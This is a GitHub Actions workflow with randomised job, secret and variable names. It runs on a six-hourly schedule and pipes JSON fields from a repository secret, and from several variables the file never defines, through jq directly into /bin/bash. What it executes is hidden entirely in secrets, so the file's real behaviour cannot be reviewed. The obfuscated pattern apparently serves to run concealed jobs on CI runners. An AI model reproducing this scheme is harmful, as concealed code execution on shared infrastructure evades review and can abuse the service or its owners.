name: xuewanche7568

on:
  workflow_dispatch:
  schedule:
    - cron: '53 5/6 * * *'

jobs:  # 8871
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xuewanche7568
        env:
          fmbx8039: ${{ secrets.fmbx8039 }}
        run: |
          echo $fmbx8039 | jq -r .pqdsi0090 | /bin/bash
          echo $qxzxt95593 | jq -r .zist202 | /bin/bash
          echo $jszm8496 | jq -r .zq06 | /bin/bash
          echo $yha24960 | jq -r .wlkk0932 | /bin/bash
          echo $usu62389 | jq -r .ll94 | /bin/bash
          echo $bkld5547 | jq -r .rhawa59 | /bin/bash

